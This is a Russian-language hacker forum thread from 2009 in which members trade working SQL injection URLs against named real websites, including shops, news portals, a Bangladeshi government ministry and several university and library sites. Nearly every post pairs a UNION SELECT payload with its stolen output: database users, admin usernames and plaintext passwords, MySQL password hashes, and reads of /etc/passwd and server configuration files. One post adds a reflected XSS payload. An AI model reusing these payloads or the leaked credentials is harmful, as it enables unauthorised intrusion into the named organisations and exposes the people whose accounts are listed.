SQL Инъекции

Assembler · 2 Feb 2009

Еще один -)
Code:
http://collectorsassemble.com/key.php?page_id=-1%20union%20select%20concat(owner_id,0x3a,owner,0x3a,owner_full,0x3a,username,0x3a,password),2,3%20from%20owner%20limit%201,1--
Хрен поймешь куда эти логины и пароли, рега без паса в таблице customer вроде..

recfrf · 2 Feb 2009

pr6

Code:

http://www.devicelink.com/products/prods.php?ProdsID=-1561+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

4.0.23-standard-log

spherics · 2 Feb 2009

Программистам

Software Programming Components Warehouse !

http://www.cookcode.com/product_detail.php?product_id=5798765476+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22--
Click to expand...

Database Version: 5.0.67-community-log
Database name: sharewar_cookcode
User name: sharewar_june@localhost

Ишем админов вендоров селлеров

http://www.cookcode.com/product_detail.php?product_id=5798765476+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(isadmin,0x3a,isvendor,0x3a,isreseller,0x3a,email,0x3a,password)+FROM+sharewar_cookcode.users+LIMIT+0,1),0x3a),0x71),0x71),12,13,14,15,16,17,18,19,20,21,22--
Click to expand...

Fields isadmin:isvendor:isreseller:emailassword

1:1:1:[email protected] : d4524322453ffdc5a5b9be7197d20bb3
0:1:0:[email protected] : ec72e3ac7a2bd7952620d8bbc44da693
0:1:0:[email protected] : 0c8054c65786089a9f58e97d26c60272
0:1:0:[email protected] : be5d7fad6cb22911f7dacb0e1a82a827
0:1:0:[email protected] : 4c4e7fa2e7efff845aae5009d51adb6f
0:0:0:[email protected] : d93a5def7511da3d0f2d171d9c344e91

Assembler · 2 Feb 2009

Code:

http://www.xpresstrading.nl/verkoop/productdetail.php?product_id=168&category_id=-34%20union%20select%201,2,concat_ws(0x3a,admin_id,admin_login,admin_pass,admin_email),4%20from%20admin--

admin_id,admin_login,admin_pass,admin_email
2:admin:rob:[email protected]

pinky07 · 2 Feb 2009

Вот вчера ночью совершил набеги на сайты rin.ru

http://news.rin.ru/photojur/-190086'+union+select+1,concat_ws(0x3a,user(),database(),version())+--+/1/1/
Click to expand...

юзер - [email protected]
бд - news
версия mysql - 4.1.20

http://persona.rin.ru/view/fall/0/-37185+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/biljaletdinov-dinijar
Click to expand...

юзер - [email protected]
бд - persona
версия mysql - 4.1.20

http://tests.rin.ru/cgi-bin/test.cgi?N=0&test=-544'+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6+--+
Click to expand...

юзер - [email protected]
бд - tests
версия mysql - 4.1.22-log

http://map.rin.ru/cgi-bin/main.pl?Region=-adig'+union+select+1,2,3,4,concat_ws(0x3a,database(),user(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
Click to expand...

юзер - [email protected]
бд - map
версия mysql - 4.1.22-log

http://lib.rin.ru/cgi-bin/new.pl?art=-2854'+union+select+concat_ws(0x3a,database(),user(),version()),2,3--+
Click to expand...

юзер - [email protected]
бд - lib
версия mysql - 4.1.22-log

http://zakon.rin.ru/cgi-bin/view.pl?id=-722+union+select+concat_ws(0x3a,user(),database(),version())+--+&midr=721
Click to expand...

юзер - [email protected]
бд - zakon
версия mysql - 4.1.20

http://wallpapers.rin.ru/cgi-bin/screen.pl?id=-33'+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6+--+
Click to expand...

юзер - [email protected]
бд - wallpapers
версия mysql - 4.1.20

http://topgun.rin.ru/cgi-bin/trash.pl?mode=show&unit=-10858+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5+--+
Click to expand...

user - [email protected]
бд - topgun
версия mysql - 4.1.22-log

http://russians.rin.ru/cgi-bin/rus/view.pl?a=fa&id=999994343+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11+--+&idr=409&n=
Click to expand...

юзер - [email protected]
бд - russians1
версия mysql - 4.1.22-log

Assembler · 2 Feb 2009

Code:

http://www.discoverytravel.ru/next.php?pid=-1337  union select table_name  from information_schema.columns where table_name --

Code:

http://www.sport-gym.ru/next.php?pid=-3%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables--

pinky07 · 2 Feb 2009

Code:

http://kazan.ws/cgi-bin/people/print.pl?action=sub&id_sub=-67+union+select+1,2,3,4,concat_ws(0x26,user(),database(),version(),LOAD_FILE('/etc/passwd')),6,7,8,9,10,11,12,13,14--&id_razdel=7&wh=razd

Assembler · 2 Feb 2009

Code:

http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--

Code:

http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--

Gorev · 2 Feb 2009

http://www.hotel-cota1400.ro/render.php?page=100'+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7/*

Version: 4.1.22-standard-log
Databse: hotelco_public
User: hotelco_cota1400@localhost

NigHT_0WL · 2 Feb 2009

Code:
http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--
user: d7775sa9187
host: z132.zone.ee
version: 5.0.67-log
db: d7775sd5376
Code:
http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--
vesion: 4.1.20
user:volierru@localhost
db:volierru

-m0rgan- · 2 Feb 2009

Code:
http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,Num,Username,Password),7,8,9,10,11,12,13,14+from+admin_eq--
логин/пасс:
Code:
eimearquinn:ei989uin_eq
Так же пасивная XSS через скуль:
Code:
http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,<script>alert()</script>,7,8,9,10,11,12,13,14+from+admin_eq--
-----------------------------------------------
The End!

hackmen · 2 Feb 2009

PR 7

http://ed.stanford.edu/suse/faculty/displayFacultyNews.php?tablename=notify1&id=-833+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=(0x75736572)+limit+3,1--

yarbabin · 2 Feb 2009

PR: 5

Code:

http://www.chicagoloopalliance.com/about.php?id=-193+union+select+1,2/*

PR: 3

Code:

http://www.kss-windows.com/next.php?id=-22+union+select+1,2/*

Gorev · 2 Feb 2009

PR1

http://www.hqcomputers.ro/produs_detalii.php?id_produs=-829+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,1,2,3,4,5,6/*&nume_produs=Imprimanta%20HP%20Color%20Laserjet%202605

Database Version: 4.1.22-standard-log
Database name: hqcomputers_ro_bdmag
User name: 11255hqc@localhost

админка
http://hqcomputers.ro/admin/login.php

табелки не подбирал.

hackmen · 2 Feb 2009

Pr 6
http://www.lib.odu.edu/libassist/guide/guide.php?id=-44+union+select+1,2,version(),4,5,6,7,8,9--
5.0.38-Ubuntu_0ubuntu1.4-log

Maestus · 3 Feb 2009

Ministry of Chittagong Hill Tracts Affairs

http://www.mochta.gov.bd/news_events.php?page_id=5&CATEGORY=1+and+1+union+select+1,concat_ws(0x20,username,password,user(),database(),@@version),3,4,1,6,7,8,9,10,11+from+tbl_user_access--
Click to expand...

[admin panel] http://www.mochta.gov.bd/adminfiles/index.php
username: admin
password: mo7bu53

Database version: 5.0.67-community
Database name: mochtag_cht
User name: mochtag_root@localhost

попугай · 3 Feb 2009

http://www.businessinsurance.com/cgi-bin/article.pl?articleId=-26853+union+select+concat_ws(0x3a,user,password,host,file_priv),concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,load_file('/etc/passwd'),9,10,11,12+from+mysql.user--
Click to expand...

PR6

Ни админки, ни путей я не нашел, походу база данных и веб сервер на разных хостах находятся.. или хз чо..
Если что у кого выйдет - отпишись в личку хотя бы)

spherics · 3 Feb 2009

HTML:
http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
Database Version: 5.0.27
Database name: yourprops
User name: admin@localhost
HTML:
http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+limit+0,1--
admin : 6632bfb46db6d97e
pma_IiabUsiU1n6q : 6c4572a01bdfb70d
horde : 039b58f6547b38c2
pma_g5Dqcuu61ikC : 60fb772f4a1fa923
pma_AVMLiZ09j6Cb : 05e06de46f9baae2
yourprops : 6632bfb46db6d97e

Читаем /etc/httpd/cpnf/httpd.conf
HTML:
http://www.yourprops.com/view_item.php?movie_prop=5179879820+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632F68747470642F636F6E662F68747470642E636F6E66),0x3a),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17--
PageRank 7

http://www.njstatelib.org/News/news_item.php?item_id=117987911+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8--
Click to expand...

Database Version: 5.0.45
Database name: wwwnews
User name: njsl_guest@localhost

Админчег

http://www.njstatelib.org/News/news_item.php?item_id=117987911+UNION+SELECT+1,2,CONCAT(0x3a,(SELECT+CONCAT(adminid,0x3a,username,0x3a,password,0x3a,tablename)+FROM+wwwuser.admin+LIMIT+0,1),0x3a),4,5,6,7,8--
Click to expand...

: 1 : rcampbell : d00key : all

PageRank 7

http://www.roamsecure.net/pressitem.php?news_id=287687767869+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10--
Click to expand...

Version:5.0.45
User:wsusr@localhost
Database:roamsecure

http://www.ditzdesigns.com/products/item.php?c=13+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10--
Click to expand...

Database Version: 5.0.21-community-nt
Database name: henhouse
User name: chicken@localhost

Админ

http://www.ditzdesigns.com/products/item.php?c=13+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(user,0x3a,password)+FROM+henhouse.admin+LIMIT+1,1),0x3a),0x71),0x71),5,6,7,8,9,10--
Click to expand...

admin : password

https://www.found412.com/item.php?merch_id=1180987678+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
Click to expand...

4.1.22
found412@localhost
found412_com

http://etd.lib.montana.edu/etd/view/item.php?id=456/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,version(),user(),database())--
Click to expand...

Version:4.1.22-log
User:etd_edit@localhost
Database:etd

Gorev · 3 Feb 2009

http://www.miracol.ro/carte.php?carte=-99+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--&titlu=Autoinstruire%20in%20parapsihologie

Version: 5.0.67-community-log
Database: :miracol_miracol
User :miracol_miracol@localhost

spherics · 3 Feb 2009

PageRank 6

http://gorillafund.org/conservation/fieldnews_item.php?recordID=997867980+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14--
Click to expand...

Database Version: 4.1.20
Database name: gorilla
User name: gorillaf_db@localhost

http://gorillafund.org/conservation/fieldnews_item.php?recordID=997867980+union+select+1,2,3,4,5,6,concat_ws(0x3a,user),8,9,10,11,12,13,14+from+mysql.user+limit+0,1--
Click to expand...

admin:7616b862045281be хэш MySQL:7616b862045281be: *test1234
pma_KOSkwHg4RA6O:5685eb1e1d67adf1
horde:6651c48b35b24923
jeff:413a5fe87cbf1d47
gorillaf_db:0dabc23b146d3b17 хэш MySQL:0dabc23b146d3b17: digit

SQL Инъекции

Assembler Elder - Старейшина

recfrf Member

spherics Elder - Старейшина

Assembler Elder - Старейшина

pinky07 Member

Assembler Elder - Старейшина

pinky07 Member

Assembler Elder - Старейшина

Gorev Level 8

NigHT_0WL Member

-m0rgan- Elder - Старейшина

hackmen Banned

yarbabin HACKIN YO KUT

Gorev Level 8

hackmen Banned

Maestus Member

попугай Elder - Старейшина

spherics Elder - Старейшина

Gorev Level 8

spherics Elder - Старейшина

Useful Searches

SQL Инъекции

Assembler Elder - Старейшина

recfrf Member

spherics Elder - Старейшина

Assembler Elder - Старейшина

pinky07 Member

Assembler Elder - Старейшина

pinky07 Member

Assembler Elder - Старейшина

Gorev Level 8

NigHT_0WL Member

-m0rgan- Elder - Старейшина

hackmen Banned

yarbabin HACKIN YO KUT

Gorev Level 8

hackmen Banned

Maestus Member

попугай Elder - Старейшина

spherics Elder - Старейшина

Gorev Level 8

spherics Elder - Старейшина